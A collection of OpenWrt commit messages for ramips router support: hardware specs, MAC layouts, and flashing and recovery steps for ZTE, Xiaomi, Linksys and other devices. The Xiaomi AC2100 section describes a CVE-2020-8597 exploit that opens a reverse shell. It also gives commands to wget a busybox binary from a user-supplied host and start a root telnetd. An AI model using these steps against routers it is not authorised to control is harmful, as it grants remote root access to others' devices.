ZTE MF283+ is a dual-antenna LTE category 4 router, based on Ralink
RT3352 SoC, and built-in ZTE P685M PCIe MiniCard LTE modem.
Hardware highlighs:
- CPU: MIPS24KEc at 400MHz,
- RAM: 64MB DDR2,
- Flash: 16MB SPI,
- Ethernet: 4 10/100M port switch with VLAN support,
- Wireless: Dual-stream 802.11n (RT2860), with two internal antennas,
- WWAN: Built-in ZTE P685M modem, with two internal antennas and two
switching SMA connectors for external antennas,
- FXS: Single ATA, with two connectors marked PHONE1 and PHONE2,
internally wired in parallel by 0-Ohm resistors, handled entirely by
internal WWAN modem.
- USB: internal miniPCIe slot for modem,
unpopulated USB A connector on PCB.
- SIM slot for the WWAN modem.
- UART connector for the console (unpopulated) at 3.3V,
pinout: 1: VCC, 2: TXD, 3: RXD, 4: GND,
settings: 57600-8-N-1.
- LEDs: Power (fixed), WLAN, WWAN (RGB),
phone (bicolor, controlled by modem), Signal,
4 link/act LEDs for LAN1-4.
- Buttons: WPS, reset.
Installation:
As the modem is, for most of the time, provided by carriers, there is no
possibility to flash through web interface, only built-in FOTA update
and TFTP recovery are supported.
There are two installation methods:
(1) Using serial console and initramfs-kernel - recommended, as it
allows you to back up original firmware, or
(2) Using TFTP recovery - does not require disassembly.
(1) Using serial console:
To install OpenWrt, one needs to disassemble the
router and flash it via TFTP by using serial console:
- Locate unpopulated 4-pin header on the top of the board, near buttons.
- Connect UART adapter to the connector. Use 3.3V voltage level only,
omit VCC connection. Pin 1 (VCC) is marked by square pad.
- Put your initramfs-kernel image in TFTP server directory.
- Power-up the device.
- Press "1" to load initramfs image to RAM.
- Enter IP address chosen for the device (defaults to 192.168.0.1).
- Enter TFTP server IP address (defaults to 192.168.0.22).
- Enter image filename as put inside TFTP server - something short,
like firmware.bin is recommended.
- Hit enter to load the image. U-boot will store above values in
persistent environment for next installation.
- If you ever might want to return to vendor firmware,
BACK UP CONTENTS OF YOUR FLASH NOW.
For this router, commonly used by mobile networks,
plain vendor images are not officially available.
To do so, copy contents of each /dev/mtd[0-3], "firmware" - mtd3 being the
most important, and copy them over network to your PC. But in case
anything goes wrong, PLEASE do back up ALL OF THEM.
- From under OpenWrt just booted, load the sysupgrade image to tmpfs,
and execute sysupgrade.
(2) Using TFTP recovery
- Set your host IP to 192.168.0.22 - for example using:
sudo ip addr add 192.168.0.22/24 dev <interface>
- Set up a TFTP server on your machine
- Put the sysupgrade image in TFTP server root named as 'root_uImage'
(no quotes), for example using tftpd:
cp openwrt-ramips-rt305x-zte_mf283plus-squashfs-sysupgrade.bin /srv/tftp/root_uImage
- Power on the router holding BOTH Reset and WPS buttons held for around
5 seconds, until after WWAN and Signal LEDs blink.
- Wait for OpenWrt to start booting up, this should take around a
minute.
Return to original firmware:
Here, again there are two possibilities are possible, just like for
installation:
(1) Using initramfs-kernel image and serial console
(2) Using TFTP recovery
(1) Using initramfs-kernel image and serial console
- Boot OpenWrt initramfs-kernel image via TFTP the same as for
installation.
- Copy over the backed up "firmware.bin" image of "mtd3" to /tmp/
- Use "mtd write /tmp/firmware.bin /dev/mtd3", where firmware.bin is
your backup taken before OpenWrt installation, and /dev/mtd3 is the
"firmware" partition.
(2) Using TFTP recovery
- Follow the same steps as for installation, but replacing 'root_uImage'
with firmware backup you took during installation, or by vendor
firmware obtained elsewhere.
A few quirks of the device, noted from my instance:
- Wired and wireless MAC addresses written in flash are the same,
despite being in separate locations.
- Power LED is hardwired to 3.3V, so there is no status LED per se, and
WLAN LED is controlled by WLAN driver, so I had to hijack 3G/4G LED
for status - original firmware also does this in bootup.
- FXS subsystem and its LED is controlled by the
modem, so it work independently of OpenWrt.
Tested to work even before OpenWrt booted.
I managed to open up modem's shell via ADB,
and found from its kernel logs, that FXS and its LED is indeed controlled
by modem.
- While finding LEDs, I had no GPL source drop from ZTE, so I had to probe for
each and every one of them manually, so this might not be complete -
it looks like bicolor LED is used for FXS, possibly to support
dual-ported variant in other device sharing the PCB.
- Flash performance is very low, despite enabling 50MHz clock and fast
read command, due to using 4k sectors throughout the target. I decided
to keep it at the moment, to avoid breaking existing devices - I
identified one potentially affected, should this be limited to under
4MB of Flash. The difference between sysupgrade durations is whopping
3min vs 8min, so this is worth pursuing.
In vendor firmware, WWAN LED behaviour is as follows, citing the manual:
- red - no registration,
- green - 3G,
- blue - 4G.
Blinking indicates activity, so netdev trigger mapped from wwan0 to blue:wwan
looks reasonable at the moment, for full replacement, a script similar to
"rssileds" would need to be developed.
Behaviour of "Signal LED" in vendor firmware is as follows:
- Off - no signal,
- Blinking - poor coverage
- Solid - good coverage.
A few more details on the built-in LTE modem:
Modem is not fully supported upstream in Linux - only two CDC ports
(DIAG and one for QMI) probe. I sent patches upstream to add required device
IDs for full support.
The mapping of USB functions is as follows:
- CDC (QCDM) - dedicated to comunicating with proprietary Qualcomm tools.
- CDC (PCUI) - not supported by upstream 'option' driver yet. Patch
submitted upstream.
- CDC (Modem) - Exactly the same as above
- QMI - A patch is sent upstream to add device ID, with that in place,
uqmi did connect successfully, once I selected correct PDP context
type for my SIM (IPv4-only, not default IPv4v6).
- ADB - self-explanatory, one can access the ADB shell with a device ID
added to 51-android.rules like so:
SUBSYSTEM!="usb", GOTO="android_usb_rules_end"
LABEL="android_usb_rules_begin"
SUBSYSTEM=="usb", ATTR{idVendor}=="19d2", ATTR{idProduct}=="1275", ENV{adb_user}="yes"
ENV{adb_user}=="yes", MODE="0660", GROUP="plugdev", TAG+="uaccess"
LABEL="android_usb_rules_end"
While not really needed in OpenWrt, it might come useful if one decides to
move the modem to their PC to hack it further, insides seem to be pretty
interesting. ADB also works well from within OpenWrt without that. O
course it isn't needed for normal operation, so I left it out of
DEVICE_PACKAGES.
Signed-off-by: Lech Perczak <lech.perczak@gmail.com>
[remove kmod-usb-ledtrig-usbport, take merged upstream patches]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Xiaomi Mi Router 4 is the same as Xiaomi Mi Router 3G, except for
the RAM (256Mib→128Mib), LEDs and gpio (MiNet button).
Specifications:
Power: 12 VDC, 1 A
Connector type: barrel
CPU1: MediaTek MT7621A (880 MHz, 4 cores)
FLA1: 128 MiB (ESMT F59L1G81MA)
RAM1: 128 MiB (ESMT M15T1G1664A)
WI1 chip1: MediaTek MT7603EN
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: U.FL
WI2 chip1: MediaTek MT7612EN
WI2 802dot11 protocols: an+ac
WI2 MIMO config: 2x2:2
WI2 antenna connector: U.FL
ETH chip1: MediaTek MT7621A
Switch: MediaTek MT7621A
UART Serial
[o] TX
[o] GND
[o] RX
[ ] VCC - Do not connect it
MAC addresses as verified by OEM firmware:
use address source
LAN *:c2 factory 0xe000 (label)
WAN *:c3 factory 0xe006
2g *:c4 factory 0x0000
5g *:c5 factory 0x8000
Flashing instructions:
1.Create a simple http server (nginx etc)
2.set uart enable
To enable writing to the console, you must reset to factory settings
Then you see uboot boot, press the keyboard 4 button (enter uboot command line)
If it is not successful, repeat the above operation of restoring the factory settings.
After entering the uboot command line, type:
setenv uart_en 1
saveenv
boot
3.use shell in uart
cd /tmp
wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin
wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin
mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin kernel1
mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin rootfs0
nvram set flag_try_sys1_failed=1
nvram commit
reboot
4.login to the router http://192.168.1.1/
Installation via Software exploit
Find the instructions in the https://github.com/acecilia/OpenWRTInvasion
Signed-off-by: Dmytro Oz <sequentiality@gmail.com>
[commit message facelift, rebase onto shared DTSI/common device
definition, bump uboot-envtools]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
FCC ID: A8J-ESR750H
Engenius ESR600H is an indoor wireless router with a gigabit switch,
2.4 GHz and 5 GHz wireless, internal and external antennas, and a USB port.
**Specification:**
- RT3662F MIPS SOC, 5 GHz WMAC (2x2)
- RT5392L PCI on-board, 2.4 GHz (2x2)
- AR8327 RGMII, 7-port GbE, 25 MHz clock
- 40 MHz reference clock
- 8 MB FLASH 25L6406EM2I-12G
- 64 MB RAM
- UART at J12 (unpopulated)
- 2 internal antennas (5 GHz)
- 2 external antennas (2.4 GHz)
- 9 LEDs, 1 button (power, wps, wifi2g, wifi5g, 5 LAN/WAN)
- USB 2 port (GPIO controlled power)
**MAC addresses:**
MAC Addresses are labeled as WAN and WLAN
U-boot environment has the the vendor MAC address for ethernet
MAC addresses in "factory" are part of wifi calibration data
eth0.2 WAN *:13:e7 u-boot-env wanaddr
eth0.1 ---- *:13:e8 u-boot-env wanaddr + 1
phy0 WLAN *:14:b8 factory 0x8004
phy1 ---- *:14:bc factory 0x4
**Installation:**
Method 1: Firmware upgrade page
OEM webpage at 192.168.0.1
username and password "admin"
Navigate to Network Setting --> Tools --> Firmware
Click Browse and select the factory.dlf image
Click Continue to confirm and wait 6 minutes or more...
Method 2: Serial console to load TFTP image:
(see TFTP recovery)
**Return to OEM:**
Unlike most Engenius boards, this does not have a 'failsafe' image
the only way to return to OEM is serial access to uboot
Unlike most Engenius boards, public images are not available...
so the only way to return to OEM is to have a copy
of the MTD partition "firmware" BEFORE flashing openwrt.
**TFTP recovery:**
Unlike most Engenius boards, TFTP is reliable here
however it requires serial console access
(soldering pins to the UART pinouts)
build your own image...
with 'ramdisk' selected under 'Target Images'
rename initramfs-kernel.bin to 'uImageESR-600H'
make the file available on a TFTP server at 192.168.99.8
interrupt boot by holding or pressing '4' in serial console
as soon as board is powered on
`tftpboot 0x81000000`
`bootm 0x81000000`
perform a sysupgrade
**Format of OEM firmware image:**
This Engenius board uses the Senao proprietary header
with a unique Product ID. The header for factory.bin is
generated by the mksenaofw program included in openwrt.
.dlf file extension is also required for OEM software to accept it
**Note on using OKLI:**
the kernel is now too large for the bootloader to handle
so OKLI is used via the `kernel-loader` image command
recently in master several other ramips boards have the same problem
'Kernel panic - not syncing: Failed to find ralink,rt3883-sysc node'
see commit ad19751edc
Signed-off-by: Michael Pratt <mcpratt@pm.me>
This updates uboot-envtools with the updated names from ramips
target.
Fixes: 6d4382711a ("ramips: use full names for Xiaomi Mi Router devices")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This commit adds support for Xiaomi's Mi Router 4C device.
Specifications:
- CPU: MediaTek MT7628AN (580MHz)
- Flash: 16MB
- RAM: 64MB DDR2
- 2.4 GHz: IEEE 802.11b/g/n with Integrated LNA and PA
- Antennas: 4x external single band antennas
- WAN: 1x 10/100M
- LAN: 2x 10/100M
- LEDs: 2x yellow/blue. Programmable (labelled as power on case)
- Non-programmable (shows WAN activity)
- Button: Reset
How to install:
1- Use OpenWRTInvasion to gain telnet and ftp access.
2- Push openwrt firmware to /tmp/ using ftp.
3- Connect to router using telnet. (IP: 192.168.31.1 -
Username: root - No password)
4- Use command "mtd -r write /tmp/firmware.bin OS1" to flash into
the router..
5- It takes around 2 minutes. After that router will restart itself
to OpenWrt.
Signed-off-by: Ataberk Özen <ataberkozen123@gmail.com>
[wrap commit message, bump PKG_RELEASE for uboot-envtools, remove
dts-v1 from DTS, fix LED labels]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Add support for the following devices:
- Xiaomi Mi Wi-Fi Router 3G v2
- Xiaomi Mi Router 4A Gigabit Edition
Signed-off-by: Antonis Kanouras <antonis@metadosis.eu>
[add explicit case for 4A, bump PKG_RELEASE,
improve commit title/message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This submission relied heavily on the work of
Santiago Rodriguez-Papa <contact at rodsan.dev>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Winbond W632GG6MB-12 (256M DDR3-1600)
* Flash: Winbond W29N01HVSINA (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7603E/MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: J. Scott Heppler <shep971@centurylink.net>
The RAVPower RP-WD03 is a battery powered router, with an Ethernet and
USB port. Due due a limitation in the vendor supplied U-Boot bootloader,
we cannot exceed a 1.5 MB kernel size, as is the case with recent builds
(i.e. post v19.07). This breaks both factory and sysupgrade images.
To address this, use the lzma loader (loader-okli) to work around this
limitation.
The improvements here also address the "misplaced" U-Boot environment
partition, which is located between the kernel and rootfs in the stock
image / implementation. This is addressed by making use of mtd-concat,
maximizing space available in the booted image.
This will make sysupgrade from earlier versions impossible.
Changes are based on the recently supported HooToo HT-TM05, as the
hardware is almost identical (except for RAM size) and is from the same
vendor (SunValley). While at it, also change the SPI frequency
accordingly.
Installation:
- Download the needed OpenWrt install files, place them in the root
of a clean TFTP server running on your computer. Rename the files as,
- openwrt-ramips-mt7620-ravpower_rp-wd03-squashfs-kernel.bin => kernel
- openwrt-ramips-mt7620-ravpower_rp-wd03-squashfs-rootfs.bin => rootfs
- Plug the router into your computer via Ethernet
- Set your computer to use 10.10.10.254 as its IP address
- With your router shut down, hold down the power button until the first
white LED lights up.
- Push and hold the reset button and release the power button. Continue
holding the reset button for 30 seconds or until it begins searching
for files on your TFTP server, whichever comes first.
- The router (10.10.10.128) will look for your computer at 10.10.10.254
and install the two files. Once it has finished installation, it will
automatically reboot and start up OpenWrt.
- Set your computer to use DHCP for its IP address
Notes:
- U-Boot environment can be modified, u-boot-env is preserved on initial
install or sysupgrade
- mtd-concat functionality is included, to leave a "hole" for u-boot-env,
combining the OEM kernel and rootfs partitions
Most of the changes in this commit are the work of Russell Morris (as
credited below), I only wrapped them up and added compat-version.
Thanks to @mpratt14 and @xabolcs for their help getting the lzma loader
to work!
Fixes: 5ef79af4f8 ("ramips: add support for Ravpower WD03")
Suggested-by: Russell Morris <rmorris@rkmorris.us>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The HooToo HT-TM05 is a battery powered router, with an Ethernet and USB port.
Vendor U-Boot limited to 1.5 MB kernel size, so use lzma loader (loader-okli).
Specifications:
SOC: MediaTek MT7620N
BATTERY: 10400mAh
WLAN: 802.11bgn
LAN: 1x 10/100 Mbps Ethernet
USB: 1x USB 2.0 (Type-A)
RAM: 64 MB
FLASH: GigaDevice GD25Q64, Serial 8 MB Flash, clocked at 50 MHz
Flash itself specified to 80 MHz, but speed limited by mt7620 SPI
fast-read enabled (m25p)
LED: Status LED (blue after boot, green with WiFi traffic
4 leds to indicate power level of the battery (unable to control)
INPUT: Power, reset button
MAC assignment based on vendor firmware:
2.4 GHz *:b4 (factory 0x04)
LAN/label *:b4 (factory 0x28)
WAN *:b5 (factory 0x2e)
Tested and working:
- Ethernet
- 2.4 GHz WiFi (Correct MAC-address)
- Installation from TFTP (recovery)
- OpenWRT sysupgrade (Preserving and non-preserving), through the usual
ways: command line and LuCI
- LEDs (except as noted above)
- Button (reset)
- I2C, which is needed for reading battery charge status and level
- U-Boot environment / variables (from U-Boot, and OpenWrt)
Installation:
- Download the needed OpenWrt install files, place them in the root
of a clean TFTP server running on your computer. Rename the files as,
- ramips-mt7620-hootoo_tm05-squashfs-kernel.bin => kernel
- ramips-mt7620-hootoo_tm05-squashfs-rootfs.bin => rootfs
- Plug the router into your computer via Ethernet
- Set your computer to use 10.10.10.254 as its IP address
- With your router shut down, hold down the power button until the first
white LED lights up.
- Push and hold the reset button and release the power button. Continue
holding the reset button for 30 seconds or until it begins searching
for files on your TFTP server, whichever comes first.
- The router (10.10.10.128) will look for your computer at 10.10.10.254
and install the two files. Once it has finished installation, it will
automatically reboot and start up OpenWrt.
- Set your computer to use DHCP for its IP address
Notes:
- U-Boot environment can be modified, u-boot-env is preserved on initial
install or sysupgrade
- mtd-concat functionality is included, to leave a "hole" for u-boot-env,
combining the OEM kernel and rootfs partitions
I would like to thank @mpratt14 and @xabolcs for their help getting the
lzma loader to work!
Signed-off-by: Russell Morris <rmorris@rkmorris.us>
[drop changes in image/Makefile, fix indent and PKG_RELEASE in
uboot-envtools, fix LOADER_FLASH_OFFS, minor commit message facelift,
add COMPILE to Device/Default]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Nanya NT5CC128M16IP-DIT (256M DDR3-1600)
* Flash: Macronix MX30LF1G18AC-TI (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Everything works! Been running it for a couple weeks now and haven't had
any problems. Please let me know if you run into any.
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: Santiago Rodriguez-Papa <contact@rodsan.dev>
[use v1 only, minor DTS adjustments, use LINKSYS_HWNAME and add it to
DEVICE_VARS, wrap DEVICE_PACKAGES, adjust commit message/title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many
characteristics (apart from its looks and the GPIO ports) with the 6-antenna
*white* "Xiaomi Redmi Router AC2100"
See the visual comparison of the two routers here:
https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg
Specification of R2100:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN in Yellow and Blue
- UART: On board (Don't know where is should be confirmed by anybody else)
- Modified u-boot
Hacking of official firmware process is same at both RM2100 and R2100.
Thanks to @namidairo
Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide
Guide is written for MacOS but it will work at linux.
needed packages: python3(with scapy), netcat, http server, telnet client
1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware
2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0
other than these I specified in here. Everything is same with:
f3792690c4
Thanks for all community and especially for this device:
@Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com)
MAC Locations:
WAN *:b5 = factory 0xe006
LAN *:b6 = factory 0xe000
WIFI 5ghz *:b8 = factory 0x8004
WIFI 2.4ghz *:b7 = factory 0x0004
Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com>
[refactored common image bits into Device/xiaomi-ac2100, fixed From:]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
The Linksys EA7500 v2 is advertised as AC1900, but its internal
hardware is AC2600 capable.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 256M (Nanya NT5CC128M16IP-DI)
FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI)
ETH: 5x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615N (4x4:4)
- 5GHz: 1x MT7615N (4x4:4)
- 4 antennas: 3 external detachable antennas and 1 internal
USB:
- 1x USB 3.0
- 1x USB 2.0
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x White led (Power)
- 6x Green leds (link lan1-lan4, link wan, wps)
- 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable)
Everything works correctly.
Installation
------------
The “factory” openwrt image can be flashed directly from OEM stock
firmware. After the flash the router will reboot automatically.
However, due to the dual boot system, the first installation could fail
(if you want to know why, read the footnotes).
If the flash succeed and you can reach OpenWrt through the web
interface or ssh, you are done.
Otherwise the router will try to boot 3 times and then will
automatically boot the OEM firmware (don’t turn off the router.
Simply wait and try to reach the router through the web interface
every now and then, it will take few minutes).
After this, you should be back in the OEM firmware.
Now you have to flash the OEM Firmware over itself using the OEM web
interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img
downloaded from the Linksys website).
When the router reboots flash the “factory” OpenWrt image and this
time it should work.
After the OpenWrt installation you have to use the sysupgrade image
for future updates.
Restore OEM Firmware
--------------------
After the OpenWrt flash, the OEM firmware is still stored in the
second partition thanks to the dual boot system.
You can switch from OpenWrt to OEM firmware and vice-versa failing
the boot 3 times in a row:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
If you want to completely remove OpenWrt from your router, switch to
the OEM firmware and then flash OEM firmware from the web interface
as a normal update.
This procedure will overwrite the OpenWrt partition.
Footnotes
---------
The Linksys EA7500-v2 has a dual boot system to avoid bricks.
This system works using 2 pair of partitions:
1) "kernel" and "rootfs"
2) "alt_kernel" and "alt_rootfs".
After 3 failed boot attempts, the bootloader tries to boot the other
pair of partitions and so on.
This system is managed by the bootloader, which writes a bootcount in
the s_env partition, and if successfully booted, the system add a
"zero-bootcount" after the previous value.
A system update performed from OEM firmware, writes the firmware on the
other pair of partitions and sets the bootloader to boot the new pair
of partitions editing the “boot_part” variable in the bootloader vars.
Effectively it's a quick and safe system to switch the selected boot
partition.
Another way to switch the boot partition is:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
In this OpenWrt port, this dual boot system is partially working
because the bootloader sets the right rootfs partition in the cmdline
but unfortunately OpenWrt for ramips platform overwrites the cmdline
so is not possible to detect the right rootfs partition.
Because all of this, I preferred to simply use the first pair of
partitions and set read-only the other pair.
However this solution is not optimal because is not possible to know
without opening the case which is the current booted partition.
Let’s take for example a router booting the OEM firmware from the first
pair of partitions. If we flash the OpenWrt image, it will be written
on the second pair. In this situation the router will bootloop 3 times
and then will automatically come back to the first pair of partitions
containg the OEM firmware.
In this situation, to flash OpenWrt correctly is necessary to switch
the booting partition, flashing again the OEM firmware over itself.
At this point the OEM firmware is on both pair of partitions but the
current booted pair is the second one.
Now, flashing the OpenWrt factory image will write the firmware on
the first pair and then will boot correctly.
If this limitation in the ramips platform about the cmdline will be
fixed, the dual boot system can also be implemented in OpenWrt with
almost no effort.
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
Co-Developed-by: Jackson Lim <jackcolentern@gmail.com>
Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
- Former "mir3g" board name becomes "xiaomi,mir3g".
- Reorder some entries to maintain alphabetical order.
- Change DTS so status LEDs (yellow/red/blue) mimic
Xiaomi stock firmware: (Section Indicator)
<http://files.xiaomi-mi.co.uk/files/router_pro/router%20PRO%20EN.pdf>
<http://files.xiaomi-mi.co.uk/files/Mi_WiFi_router_3/MiWiFi_router3_EN.pdf>
|Yellow: Update (LED flickering), the launch of the system (steady light);
|Blue: during normal operation (steady light);
|Red: Safe mode (display flicker), system failure (steady light);
Signed-off-by: Ozgur Can Leonard <ozgurcan@gmail.com>
[Added link to similar Router 3 model]
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
Hardware:
CPU: MediaTek MT7621AT (2x880MHz)
RAM: 512MB DDR3
FLASH: 256MB NAND
WiFi: 2.4GHz 4x4 MT7615 b/g/n (Needs driver, See Issues!)
WiFI: 5GHz 4x4 MT7615 a/n/ac (Needs driver, See Issues!)
USB: 1x 3.0
ETH: 1x WAN 10/100/1000 3x LAN 10/100/1000
LED: Power/Status
BTN: RESET
UART: 115200 8n1
Partition layout and boot:
Stock Xiaomi firmware has the MTD split into (among others)
- kernel0 (@0x200000)
- kernel1 (@0x600000)
- rootfs0
- rootfs1
- overlay (ubi)
Xiaomi uboot expects to find kernels at 0x200000 & 0x600000
referred to as system 1 & system 2 respectively.
a kernel is considered suitable for handing control over
if its linux magic number exists & uImage CRC are correct.
If either of those conditions fail, a matching sys'n'_fail flag
is set in uboot env & a restart performed in the hope that the
alternate kernel is okay.
If neither kernel checksums ok and both are marked failed, system 2
is booted anyway.
Note uboot's tftp flash install writes the transferred
image to both kernel partitions.
Installation:
Similar to the Xiaomi MIR3G, we keep stock Xiaomi firmware in
kernel0 for ease of recovery, and install OpenWRT into kernel1 and
after.
The installation file for OpenWRT is a *squashfs-factory.bin file that
contains the kernel and a ubi partition. This is flashed as follows:
nvram set flag_try_sys1_failed=1
nvram set flag_try_sys2_failed=0
nvram commit
dd if=factory.bin bs=1M count=4 | mtd write - kernel1
dd if=factory.bin bs=1M skip=4 | mtd write - rootfs0
reboot
Reverting to stock:
The part of stock firmware we've kept in kernel0 allows us to run stock
recovery, which will re-flash stock firmware from a *.bin file on a USB.
For this we do the following:
fw_setenv flag_try_sys1_failed 0
fw_setenv flag_try_sys2_failed 1
reboot
After reboot the LED status light will blink red, at which point pressing
the 'reset' button will cause stock firmware to be installed from USB.
Issues:
OpenWRT currently does not have support for the MT7615 wifi chips. There is
ongoing work to add mt7615 support to the open source mt76 driver. Until that
support is in place, there are closed-source kernel modules that can be used.
See: https://forum.openwrt.org/t/support-for-xiaomi-wifi-r3p-pro/20290/170
Signed-off-by: Ozgur Can Leonard <ozgurcan@gmail.com>
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
[02_network remaps, Added link to notes]
Beside one exception, no one took care of these two remaining boards
still using the legacy image build code during the last two years.
Since OpenWrt 14.07 the ALLNET ALL0239-3G image building is broken.
The Sitecom WL-341 v3 image build code looks pretty hackish and broken.
It's questionable if the legacy image works as all.
Signed-off-by: Mathias Kresin <dev@kresin.me>
The LinkIt Smart 7688/LinkIt Smart 7688 Duo are identical beside the
extra ATmega32U4 - accessible via UART - on the the Duo.
Since all relevant hardware is identical, drop the Duo special handling
in userspace.
Signed-off-by: Mathias Kresin <dev@kresin.me>
This commit improves support for the Xiaomi Mi Router 3G originally
added in commit 6e283cdc0d
Improvements:
- Remove software watchdog as hardware watchdog now working as per
commit 3fbf3ab44f for all mt7621
devices.
- Reset button polarity corrected - length of press determines reboot
(short press) vs. reset to defaults (long press) behaviour.
- Enable GPIO amber switch port LEDs on board rear - lit indicates 1Gbit
link and blink on activity. Green LEDs driven directly by switch
indicating any link speed and tx activity.
- USB port power on/off GPIO exposed as 'usbpower'
- Add access to uboot environment settings for checking/setting uboot
boot order preference from user space.
Changes:
- Front LED indicator is physically made of independent Yellow/Amber,
Red & Blue LEDs combined via a plastic 'lightpipe' to a front panel
indicator, hence the colour behaviour is similar to an RGB LED. RGB
LEDs are not supported at this time because they produce colour results
that do not then match colour labels, e.g. enabling 'mir3g:red' and
'mir3g:blue' would result in a purple indicator and we have no such
label for purple.
The yellow, red & blue LEDs have been split out as individual yellow,
red & blue status LEDs, with yellow being the default status LED as
before and with red's WAN and blue's USB default associations removed.
